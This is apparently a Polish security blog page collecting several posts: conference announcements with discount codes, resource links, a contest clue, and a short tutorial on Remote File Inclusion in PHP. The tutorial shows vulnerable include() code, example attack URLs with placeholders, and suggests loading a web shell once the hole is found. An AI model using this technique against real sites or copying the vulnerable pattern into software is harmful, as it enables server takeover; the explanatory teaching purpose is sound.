Inżynieria społeczna – narzędzia

0
Z ciekawszych zbiorów na GitHubie znajduje się lista narzędzi przydatnych, jeśli interesujecie się inżynierią społeczną.  

„No humans were manipulated to make this list.”

Jadę na Technology Risk Management Forum 2017!

3
Na różne konferencje warto jeździć z kilku powodów. Wiedza, możliwość wymiany doświadczeń, poznania nowych ludzi. Rozmowy z ludźmi dużo bardziej doświadczonymi kształtują młodego człowieka (na przykład mnie), dlatego jeśli dopiero zaczynasz stawiać swoje pierwsze kroki w karierze, to możliwość poznania nowych ludzi jest nieoceniona. Dlatego zapraszam do Wrocławia w dniach 21-22 czerwca br. na Technology Risk Management Forum 2017 – drugą edycję konferencji organizowanej przez ISSA Polska, Technology Risk & Information Security oraz Evention, poświęconej bezpieczeństwu IT i zarządzaniu ryzykiem technologicznym. W ramach konferencji organizowane będą WARSZTATY – konkretna dawka wiedzy i pracy zespołowej – tematyka warsztatów:
  • Zarządzanie świadomością bezpieczeństwa pracowników – prowadzenie: Andrzej Nowodworski, Immunity Systems
  • Pomocnik RODO – prowadzenie: Beata Marek, Cyberlaw
  • Podstawy inżynierii odwrotnej (złośliwego) oprogramowania (reverse engineering) – prowadzenie: Karol Celiński, Immunity Systems
Wybrane tematy wystąpień:
  • Atak z użyciem serwera KNF. Zaawansowany i wyrafinowany, czy może… trywialny w wykryciu i przeciwdziałaniu? – Artur Maj, Information Security Professional, Prevenity; Mariusz Burdach, Prevenity
  • Ofensywna defensywa –hakowanie własnych pracowników oraz hakowanie hakerów – Paweł Maziarz, Immunity Systems; Karol Celiński, Immunity Systems
  • Art. 269b KK po nowemu –Beata Marek, Cyberlaw
  • Łowienie w morzu pakietów, czyli jak ukrywają się serwery Comand and Control (C2)C2 – Ireneusz Tarnowski, Blue Cyberspace, Wrocławskie Centrum Superkomputerowo-Sieciowe
  • Zagrożenia cybernetyczne rozproszonej infrastruktury teleinformatycznej – Przemysław Mączkowski, Energa Operator
UWAGA! Dla czytelników Shinsec 20% zniżki przy zakupie wejściówki do 15 czerwca! Koszt udziału wynosi jedynie 719 PLN netto. Przy rejestracji wystarczy w polu kod promocyjny wpisać hasło Shinsec”.
Więcej informacji na stronie wydarzenia. Zapraszam!

Coroczny raport CERT Polska o bezpieczeństwie IT w Polsce

1
CERT Polska opublikował coroczny raport o działalności zespołu. Zawiera on najważniejsze wydarzenia na świecie oraz w Polsce. Znajdziesz w nim opis ataków i zagrożeń. Na uwagę szczególnie zasługuje szczególnie opis botnetu Mirai.

./konkurs CONFidence 2017

2
Konkurs! Osoba, która jako pierwsza wyśle rozwiązanie (słowo-klucz) wygra wejściówkę na CONFidence 2017! Dodatkowo spośród nadesłanych odpowiedzi rozlosuje dwa kody uprawniające do zakupu wejściówki za połowę ceny! Hasło należy przesłać do 21 kwietnia do godziny 16:00 na adres sec[at]shinsec.pl aHR0cHM6Ly9zaGluc2VjLnBsL3Bhc3NwaHJhc2UuYXNj aHR0cHM6Ly9zaGluc2VjLnBsL2NyYWNrdGhpcw==

Testy penetracyjne – narzędzia, kursy, książki oraz inne materiały

1
Na githubie znajduje się naprawdę pokaźny zbiór materiałów związanych z testami penetracyjnymi. Znajdziesz tam spis narzędzi, książek, kursów oraz inne dodatkowe informacje.

Remote File Inclusion

0

Remote File Inclusion

RFI to typ podatności często znajdywany na stronach stworzonych z użyciem PHP. Błąd ten pozwala atakującemu dołączyć zdalnie hostowany plik, zazwyczaj poprzez skrypt na serwerze. RFI jest możliwe, ponieważ to co wprowadza użytkownik nie jest odpowiednio filtrowane. Może to prowadzić na przykład do wyrzucenia zawartości pliku, ale w zależności od skali błędu możemy wykonać dowolny kod na serwerze.

Atak

Remote File Inclusion występuje wtedy, kiedy to co wprowadzi użytkownik nie jest poprawnie filtrowane lub oczyszczane. Następujące dane muszą zostać odpowiednio przygotowane przed przetworzeniem:
  • Parametry URL
  • Parametry GET i POST
  • Nagłówki HTTP
  • Ciasteczka
Korzystając z wartości parametrów zawartych w adresie (http://example.com/?page=ADRES_STRONY) serwer uzyskuje dostęp do zdalnego pliku zawartego w adresie URL i załącza złośliwy kod z tego pliku do aktualnie wykonywanej strony na serwerze. Skrypt ten może ukraść wrażliwe dane, przejąć serwer czy zainstalować backdoora.

Web Shells

Dostępne są w internecie web shelle. Kiedy odkryjesz podatność załącz któryś z nich. Przykładowy dość pokaźny zbiór znajdziesz tutaj. Zadaniem takiego narzędzia jest dostarczyć atakującemu panel do zarządzenia serwerem. Z ich pomocą możesz całkowicie przejąć system, uzyskać dostęp do komend systemowych, zainstalować backdoory itp.

Przykład

Użytkownik chce odwiedzić stronę. W przypadku, kiedy strona główna (index.php) przetwarza wartość parametru page jako
<?php include($_GET["page"]); ?>
Wtedy, jeśli użytkownik jako adres strony poda
http://example.com/?page=contact.php
serwer wykona contact.php i wyświetli jego zawartość na stronie głównej. Jak to wykorzystać? Zamiast contact.php wstawić adres do naszego złośliwego kodu.
http://example.com/?page=ADRES_STRONY_RFI

Przykład 2

if($error==1){
   include($err.'.php');
}
W tym przypadku atak wygląda następująco
http://example.com/index.php?error=1&err=ADRES_STRONY_RFI
Więcej: https://www.owasp.org/index.php/Top_10_2007-A3 https://en.wikipedia.org/wiki/File_inclusion_vulnerability

Jadę na CONFidence 2017!

5
Shinsec został patronem medialnym CONFidence 2017. Sekrety hakerów, najnowsze odkrycia i IT security na najwyższym poziomie – poznasz je na konferencji CONFidence Opuszczony gmach, ciemne korytarze i atmosfera tajemnicy to idealne otoczenie dla najbardziej cyberbezpiecznego wydarzenia sezonu. Po raz kolejny mroczny charakter Hotelu Forum w Krakowie stanie się tłem do dyskusji o największych sekretach hakerskiego świata. 18 i 19 maja przejmuje go konferencja CONFidence!

Bezpieczeństwo IT, czyli…

…cyberprzestępczość, analiza podatności, Internet of Things, scenariusze ataków, ochrona danych, social engineering i inne najistotniejsze tematy. Nie sposób wymienić wszystkich zagadnień poruszanych przez prelegentów podczas CONFidence, ale jedno jest pewne – na wykładach omawiane są najbardziej aktualne, kontrowersyjne i trudne kwestie, z którymi specjaliści IT stykają się na co dzień. Eksperci dzielą się na scenie swoimi sukcesami, odkryciami, badaniami, publikacjami i dochodzeniami, a wszystko to w ramach wykładów i angażujących warsztatów.

Czołówka polskiego IT security w jednym miejscu

Tak w skrócie można opisać nową Radę Programową CONFidence! W jej skład wchodzą najbardziej zaangażowani, doświadczeni przedstawiciele tej branży: Gynvael Coldwind, Mateusz „j00ru” Jurczyk, Hanna Tułowiecka, Wojciech Dworakowski, Piotr Konieczny, Michał Sajdak, Adam Haertle, Gaweł Mikołajczyk i Przemysław Skowron. Podczas tej edycji po raz pierwszy będą oficjalnie odpowiadać za poziom merytoryczny konferencji. Możecie spodziewać się jeszcze bardziej technicznej, konkretnej agendy.

Dwie ścieżki, dwa dni, ogromna dawka wiedzy

Wkrótce ujawnione zostaną nazwiska pierwszych prelegentów. Wśród nich znajdą się wiodący specjaliści IT security z całego świata, w tym przedstawiciele służb i instytucji rządowych, środowisk naukowych oraz organizacji międzynarodowych. Co jeszcze wydarzy się w ciągu tych dwóch dni? Na uwagę zasługuje flagowy element CONFidence, czyli rozgrywki Capture The Flag organizowane przez Dragon Sector.

Największe spotkanie hakerów w Polsce

Warto to wykorzystać! CONFidence daje możliwość wymiany doświadczeń z innymi. Jednak przede wszystkim to luźne spotkanie w gronie fantastycznych ludzi, gdzie nawiązywanie kontaktów może być równie wartościowe, jak czerpanie nowych umiejętności z prezentacji. Właśnie dlatego organizatorzy konferencji przygotowali 15% zniżki dla wszystkich, którzy nie chcą przegapić tej okazji. Wystarczy podczas rejestracji wpisać kod: SHINSEC Niedługo pojawi się konkurs, w którym do wygrania będzie wejściówka! http://2017.confidence.org.pl/

SQL Injection – ściągawka

0
Netsparker opublikował na blogu bardzo przydatną ściągawkę dotyczącą ataków SQLi. Zainteresowanym polecam zerknąć również na pdf’a udostępnionego przez Rapid7 oraz na stronę websec.ca

Jadę na SEMAFOR 2017!

0
Tym razem kolej na SEMAFOR 2017, czyli wydarzenie, które odbędzie się 30-31 marca w Warszawie na PGE Narodowym.
Konferencja SEMAFOR jest jednym z najważniejszych wydarzeń związanym ze światem bezpieczeństwa informacji i audytu IT w Polsce – w 2016 r. gościliśmy ponad 350 uczestników, 18 wystawców i 22 partnerów konferencji. Podczas wydarzenia wręczyliśmy także nagrody dla zwycięzców Security Excellence – pierwszym tego typu konkursie dla osób związanych z bezpieczeństwem IT. SEMAFOR to idealne miejsce do zapoznania się z bieżącymi zagrożeniami i ciekawymi case studies, zdobycia nowego doświadczenia oraz nawiązania i podtrzymania relacji w środowisku bezpieczeństwa i audytu IT.
Więcej: http://semafor.computerworld.pl

OWASP Top Ten – darmowe materiały wideo od Pluralsight

0
Jeśli ktoś chce wejść w tematykę bezpieczeństwa aplikacji internetowych powinien zapoznać się z filmikami udostępnionymi przez Pluralsight omawiającymi OWASP Top Ten. Dokument ten omawia dziesięć najbardziej istotnych luk w aplikacjach internetowych.
OWASP Top 10 „The Big Picture” is all about understanding the top 10 web security risks we face on the web today in an easily consumable, well-structured fashion that aligns to the number one industry standard on the topic today.